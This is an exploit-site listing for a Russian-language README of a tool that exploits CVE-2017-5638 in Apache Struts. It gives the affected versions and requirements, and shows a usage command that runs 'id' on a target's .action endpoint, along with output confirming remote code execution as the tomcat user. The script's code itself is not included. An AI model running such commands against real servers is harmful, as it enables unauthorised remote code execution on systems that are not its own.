Sploitus

Exploit for CVE-2017-5638-ApacheStruts2.3.5

kitploit · 2026-08-22

Exploit Code

MARKDOWN21 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-FREDBRAVE-CVE-2017-5638-APACHESTRUTS2.3.5
# CVE-2017-5638-ApacheStruts2.3.5

Эксплойт для CVE-2017-5638. Этот эксплойт работает на версиях 2.3.5-2.3.31 и 2.5 – 2.5.10

# Требования

optparse, requests

# Использование

Этот эксплойт можно использовать следующим образом:

root@kitploit:~
    
    
    $ python3 CVE-2017-5638ApacheStruts.py -u http://10.129.187.188:8080/Monitoring/example/Welcome.action -c id
    b'uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)'
    

Для его работы необходимо указать .action файл.